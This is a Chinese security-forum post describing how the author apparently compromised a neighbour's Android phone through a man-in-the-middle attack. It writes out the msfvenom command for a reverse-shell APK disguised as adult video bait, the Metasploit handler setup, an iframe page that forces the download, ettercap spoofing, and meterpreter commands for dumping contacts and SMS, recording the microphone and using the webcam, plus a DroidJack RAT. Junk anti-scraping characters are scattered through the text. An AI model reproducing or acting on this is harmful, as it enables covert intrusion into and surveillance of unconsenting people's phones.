找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1449|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

$ G3 p8 x$ w9 G- Q 五、msf+ettercap入侵邻居安卓手机 5 l+ {, R+ z8 Y6 K7 X2 K

7 N ^& L2 _6 Z/ @

' V8 J, _+ G @0 y1 U( p ? 首先启动msf ) L: e8 I0 W. g3 I0 |

2 I6 C; u& L) e1 T

" ^+ l z3 x1 ?3 [. c+ [ 先用kali生成一个安卓木马,如下命令: . |% y2 O6 e# Y; j- o

' X4 k8 Z+ k6 s5 }0 O7 @1 e1 [

3 u& L4 k3 E; K- r2 R; j9 ~- e3 i Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % j P7 |0 N" ?3 L/ J

6 x% `8 ]( v5 z

% o6 U0 u6 A$ g/ ?0 t* T2 S 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ' h) L: e! Z) U0 P2 V6 b% X

2 r1 x2 b' i" _" V# k7 k6 m) ^/ u

7 [7 L6 T$ I( r1 m) R2 v! a: p- X 然后进入msf ; E/ a& t$ m: m- D$ E7 D; p/ Q# }

; W* K$ b. h, q( k& G1 y

+ i$ k4 h- k5 y6 x9 y use exploit/multi/handler ) j) q8 g5 C; h/ }

# ?7 C1 |) J2 y& g

0 r) H8 p9 z6 m3 J% |0 m set payload android/meterpreter/reverse_tcp ) c9 o1 G. V. S( X# t

7 e9 L& y* E1 i) c

, d, E v$ F, L5 {$ Z0 q% e8 t set LHOST 192.168.0.109 //ipkailiip , p7 J1 y) D1 l6 |" w

; R$ R, l" P* ^: ?7 o

5 x( \9 u/ F! W. ?6 c+ c: Z set LPORT 44444 //端口一定要与前面生成的木马的端口一致 , e' C, d* n5 z8 K1 _9 X

: r4 k6 Z, R' l

* U! V) v) N& Y Exploit 4 z* z2 n* T6 r: o# G( T& V" ]

- T% `. s2 T: k( N3 w ?7 C

7 B; C7 D+ u. t, k   ) c z* R: j2 N- L8 g

4 v" d k8 Z8 g8 A. b

* ~7 W/ D3 V, G3 t- A 下面我们开启ettercap -G # E& m2 X, W) @" O

( s% v" _% b: R/ Z$ _& W

4 V# Y: k! ]1 X% G 我物理IP , Z1 Z" \* [: ?4 `' L) B

! p: A) f t, v3 d7 l5 W

% `+ k4 M( X5 i. b( Y   ' l8 `- i9 I# ~7 I ~- B {- G

: v0 U6 X# Z$ ~5 q- h1 p' F

' I/ L! V1 p- t! q6 p 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, . F$ W1 X( X2 ?- i1 {6 |

. ~) V5 ~3 a4 s) X$ @

0 [/ Y# r% L0 Q 下面我们来设置一下 ; I g; e n! Z; \

{* H( ], Z$ |/ j

2 U0 w B: l0 g ?* q3 S! I. ^$ Z   / J- [; w8 Q/ q/ g( a+ Y. \( B# z

/ f: }: D* i. D) i' U, W4 @

. r S' l& U% }6 q& {' s 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 s! C+ N# i. Q2 F: h

+ i7 g% b6 s2 {: P+ t, Y9 q

/ E3 r( O# h" a6 _' m8 j   % Z/ i* k& G) J8 j) }: e" k9 G

3 i8 b2 q4 Y* R8 i/ \" x, d! d u5 \

1 Q3 V; R8 d4 @9 }! [' Q   - _. _# X9 A+ N7 l

6 r: r. S! f3 |) M0 y% o

0 |5 I# l% Y# }   9 U6 X4 p- k L/ w

+ C) c) l' J! l# K0 J& a8 F D& d

0 ?- k+ g; A1 I" g/ @# H3 t   # ~$ P+ ]4 y0 H; M1 ^

* q, e0 S6 h5 _5 g- k" W

) q, T+ `5 n% t N3 @   8 }8 J9 q: o Z* ?: K6 m9 C4 z1 V2 x2 O

+ I0 A$ k& X4 U, T! Z# u

j& G" X+ c1 X   6 p- ^6 v: a6 l8 t3 G2 |

: a! K ^. l2 m8 r" q

1 @( O% q+ n4 f9 p   * Z* c4 I/ U( x; D) |# f+ f H/ P+ H

! e+ s+ b6 ^+ K4 \- x

8 u2 i4 \( l }' \6 y   $ j6 J6 C+ _1 H, \" n5 F

0 l8 b5 F* }- H+ i

5 v) P/ _) m2 }: d% i   7 B9 a6 y* K8 r8 C2 _' l

1 Q' O- P- \( a9 z8 B

& h# W% {$ w. `0 b! e( Y B   , b" W5 |% L# x9 v) m. ?" a

9 z& g" e) n- V/ b/ {

! P& O- O& ?6 K* b6 r+ v   % }" ` u) [1 u+ U u0 s4 r* e

9 v9 I; b5 ~; Z6 H( p A+ C

9 ^+ ]. d& K8 E! Q   * S/ Q, S: f4 x5 w: V2 O

- X. j) L% I; f) x

/ G' X" S; m. V7 r+ }, e   % q [% p% ~3 r I, I1 Q9 z

# x' C3 M3 y3 m3 m& d0 D* A

+ J/ |* t1 \& J 下面我们开始攻击 8 W' }5 {& @4 ^7 \* a, N

; R0 s5 |, v$ {5 |" n

1 h# D2 w2 R6 J( R7 ~: ~3 a( i   7 g6 ?& @6 w! e% ]3 ~/ S% D7 A

* `, I, \/ C7 K2 l( d9 u

; X" k. K- Y, _! M, x5 `+ l' w   6 \" J+ q# b1 v& G" J2 }; U! o& t

/ q2 i1 _' ^5 }, s/ @( E

" v* ^) F) x* A3 {4 y   7 c% I5 O; A1 @4 v! m3 F- p. z a

! L/ ^3 w: i0 Q# r5 {$ S- _

, v, r% k' r) ~( d   ! f& [: d2 e1 g" d# f

1 Z6 J$ E4 j+ L& u! t) d; h# b

# N0 h& F+ {2 ]3 p' q. C$ e   , x8 E( J; A. i1 H1 c

/ _: J7 H4 Z' X3 X: h

' |5 a; F+ o0 S4 \# g 大概过了5分钟多,发现反弹成功了 3 @! W3 a3 D/ M2 K

: o0 J% ?5 |3 u

( |3 V- ?& O7 {9 P* f   9 ^9 _) Y7 Q: L) t

! G9 n, j0 x3 m) A" L& D

: y; n" f9 v M- P! {/ j   2 V( w4 Z' X0 z6 |* Q: a

, s2 J2 a- Z! h- i3 o0 A$ \* d" R4 |' s5 k

/ c: a/ e' }1 U6 l   / `3 A4 X" _7 L* A

" r O7 k3 H! r7 E4 b

2 o! D& J# I' y9 [3 v   # R! W1 f8 ~9 ]! d; X

5 w0 `/ f4 `6 b# m

$ v# J! ~4 |+ {   " L& B( g$ X2 ]$ r

8 w( d4 p9 u9 u- r7 x5 J% V A

* Z1 o K$ R4 I1 n# A   6 g2 f/ X5 q: _

7 o& N$ \- a" V5 D& ]2 h9 n

6 L. r( J( [( E9 O, d$ |- u; a   5 O! s5 n8 M0 m: }/ r$ W) M2 K

: [8 U* j- W* H

' e) n5 o+ y) W" n; |: m 执行命令 / U- a7 X8 ]* I: m1 c

7 Y s3 J9 a1 K$ n' `* D" {

3 a8 O$ F4 Q3 }4 S# e! ^   : V, U, p. d" ~* A4 O

( a$ X+ U$ S; D+ ^0 [

, |/ F' W: ^1 @6 z dump_contacts    --》这个是导出电话 1 V& Q6 C& t% Y; [' O+ z) t! v

7 X: h) D1 u M* } w

9 I1 |/ U" z. n8 y% Y dump_sms --》这个是导出信息 Z: ^* H+ f7 m0 Y

$ k3 c, c/ I( l, @5 t- a

5 i, J" K1 n) L! L* k; W record_mic     Record audio from the default microphone for X seconds , u/ e6 A* x$ x) e

, S$ D$ K, _ x) S0 G3 a

% ` g3 K2 {& ~. `6 G     webcam_chat    Start a video chat " z2 u, W* Q: }9 O

U! R9 {" }) E) e( g) Y/ j7 l

& o0 B2 Y. Y* `. m( A9 X) \1 D     webcam_list    List webcams $ \0 z" H1 H. n/ D9 D! `3 L! k

. @8 q# F1 l# r

7 D! i* I4 \' Y7 G6 q2 |( U     webcam_snap    Take a snapshot from the specified webcam 6 R3 m* j4 k! O- t

5 e9 N% F! |+ c4 A/ g; r

6 W# Y$ v3 Y- A& n' D( a webcam_stream  lay a video stream from the specified webcam ( `0 @; |% b# p, h5 z" o

9 M1 t8 p: N, H* U/ E

0 M+ ~* ]& k! |5 a2 V4 I   K/ a i* L+ d8 `

3 }, S4 g' F% j- e6 d' S; j: i2 D

& w: l5 \# j" f5 q+ q% f; W9 ~   : s3 s9 Q; x' X. S6 q) O9 [

1 r9 x9 W. R0 @2 |3 z9 q' U" i

0 J4 k2 g1 _; L. e) U0 u9 |$ I 我们打开看一下电话薄, ! @* S, E+ ` J4 G4 j) C

+ e p2 p. a" D

( [$ S) E5 x$ ]2 \" j/ G9 ^   8 S# |0 `' E, u" \

$ @. Z7 R7 H* Q8 n: }

4 ?/ V# ?5 o( ]: C. C   & R+ \% Z# N% w' d

9 E7 _. O* N5 S0 X

3 \. R- {$ C. w0 D   * W: w$ t' `8 }+ A# \5 ]2 O7 s$ t' W

- E; O1 g/ [& ~% Y% Y9 ?* G

0 c+ e" m" g6 [ M   8 ^( ~1 `0 w# z

; e4 L0 L% S: w$ W- c

6 \6 F+ J! X* `' ~* @" `   , U2 S( F, q0 l/ l; j

' \) i; K5 V# b0 z1 w! i0 X/ n

7 V5 k9 q* }: K7 Z( ]0 \8 z   5 g$ v, O- l3 G2 p! Y! x

. V: P( [' Y' N' S7 q

) V5 W" k7 S( g( C; E# j) d 我们同时欺骗成DroidJack木马,使用方法如图: k% o, Z+ }6 j

/ Y5 L. s' t) b

; U7 Z+ x/ h- S& {( a t) ~- j   : x8 j& Y8 ]; ^7 ^3 Z/ u% M% p

) b0 J7 ^' T2 v( W8 e- k

% f4 E! q0 d5 A* B6 N   5 l6 ]9 M7 Z# v+ a6 P

( j. Z" J3 h+ h' X1 V7 m* D

. Q, N7 x3 @5 u$ G   , D/ G- o$ N9 ~" b/ r5 Y" [

1 M0 A6 ?* {6 N( s; Q

1 Q& a5 I( H& S: q6 P( f0 ?' f& x 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 8 h( h8 R5 W+ ^4 `# n+ Y5 @

6 q/ O D+ f. B7 a$ Z

. m! d" M! _$ R1 O* f   2 G( a' E0 F3 y7 y4 ]+ y

( {4 q) |* p1 d

1 j" t, E+ ~$ u% p   ) g* k, _" t$ A3 m' y! V O

, H% {5 I" l, F! K4 n" E8 c9 R

' i( o5 G) [* S6 K: U0 Y   ' F; K& {0 o5 y2 |

3 S& @/ @' v; @$ X6 q3 _6 I

! v: {" h0 [+ ^9 x ) _# V) }" x) u& G6 w5 T3 T

" F( y8 s7 r/ ^' d1 ?: A- L

% o" \ C: i- [* ]9 w" P
1 ~2 z7 y# t# a6 k% b1 J

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表